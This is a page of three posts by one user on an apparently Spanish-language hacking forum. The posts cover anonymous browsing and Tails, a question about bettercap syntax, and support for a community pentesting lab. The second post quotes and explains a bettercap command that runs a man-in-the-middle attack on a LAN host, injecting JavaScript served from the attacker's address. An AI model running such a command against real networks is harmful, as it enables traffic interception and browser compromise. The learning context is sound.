Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - dantoor_mx

#1
Debates, Reviews y Opiniones / Que tan anónimos navegamos?
Septiembre 07, 2017, 11:43:31 AM
Hola chic@s

Me tomo un tiempo decidir dos cosas que me llevan a escribir este tema en cuestión de duda y me gustaría explicar el primer puntos decisivos:

1: Escribir esto sin leerme tonto pues es una inquietud que he conversado con algunos compañeros en la oficina y sentimos que debemos esclarecerla esperando ustedes puedan compartinirnos de su experiencia o conocimiento.

2: Decidir en que Sub-foro postear pero debido a que es sobre Hardware de Redes inalambricas o al menos es lo que pudimos escuchar en una charla.

Bueno pasamos a la cuestion principal una vez deje explicados los puntos anteriores, y es que nosotros usamos una Distribucion llamada Tails que ya muchos conoceran por aqui ya que se puede navegar de forma mas "Anonima" por la red ONION ya que como sabemos al navegar por la Surface compartimos mucha información y esta segun su informacion nos permite navegar "Seguro" y es cómoda hacerla Booteable en nuestra USB.
Escuchando la charla alguien comento que existen una especie de "Routers Furtivos" los cuales te permiten navegar sin tener una IP a lo que nosotros creemos que es imposible omitir esto en los protocolos TCP/IP pues creo que sabemos que son parte fundamental de la comunicación entre las maquinas sirviendo como un tipo de traductor de lenguaje (Segun un ejemplo de un cuaderno de HackxCrack antiguo) o algo asi por no entrar mas en detalles, a lo que nace esa duda ante nosotros y planteamos la siguiente pregunta:

¿Existe un Hardware(Router, Modem, etc..) que nos permita tal cosa?
En todo caso creo que puede haber un router que nos vaya cambiando nuestra IP o algo similar como los equipos Meraki de Cisco que he tenido problemas para analizar su trafico.

Espero comenten y compartan lo que saben al respecto.
#2
Hola de nuevo, creo que para algunos de nosotros seria importante conocer la estructura de los comandos o parte de ella, ya que si bien usamos otros framework o tools mediante la terminal podemos confundirnos al momento de empezar a usar este grandioso Framework, o es una simple opinion en el este caso al tratar de comprender la ultima parte de lo siguiente:

Citarbettercap -T 192.168.0.101 --proxy-module injectjs --js-url "No tienes permitido ver los links. Registrarse o Entrar a mi cuenta"

Quisiera imaginar que aquí especificas el Target
Citar-T 192.168.0.101

Aqui especificas el modulo a usar
Citar--proxy-module injectjs

Aqui pensaria que le pasas opciones del modulo especifico
Citar--js-url


Y por ultimo la IP del atacante (Tu IP) donde se aloja el JavaScript
Citar"No tienes permitido ver los links. Registrarse o Entrar a mi cuenta"



Por favor si estoy mal díganmelo para poder entender un poco mas este framework aun no lo comienzo a usar pero me resulto de muy buena pinta este tutorial que creo pudiésemos ocupar para combinarlo con otros vectores.
#3
CitarBuenos días comunidad, vengo con una sugerencia nacida desde el Whatsapp de la web, en la cual planteando la temática de labs, nos propusimos a debatir distintas ideas y formas de llevar a cabo un servidor casero parecido a VulnHub(obviamente poniendole nuestra impronta),  con Hardware libre, como una Raspberry PI, y con software libre, como openVPN y Samba(como ejemplos). Con la cual podamos abrir no solo un nuevo horizonte en lo que se refiere a la enseñanza de distintas áreas como pentesting, programación, si no también plantearnos la apertura de una Escuela formada por la comunidad para formarnos de forma autodidacta pero teniendo la guía y programas dentro del servidor para tener organizado los conocimientos de forma que nos facilite a la hora de estudiar de forma sería, si no que también tengamos la experiencia de compañeros que se especializen en distintas áreas, hasta poder sacar papers profesionales desde la misma con grupos de trabajos.
Quisiera saber que les parece, formar grupos y llevar a cabo este proyecto.

Hola a todos, yo vengo de otros foros y son las primeras veces que tengo actividad aquí, por lo que se lee me parece una genial idea y espero se lleve a cabo o se allá llevado a cabo ya pues en otros foros esto solo queda como una idea y nada mas, es importante poder tener espacios controlados en donde la comunidad pueda desarrollar sus habilidades (Skills) para mejorar de manera profesional.

Es solo una opinión, buen día a todos.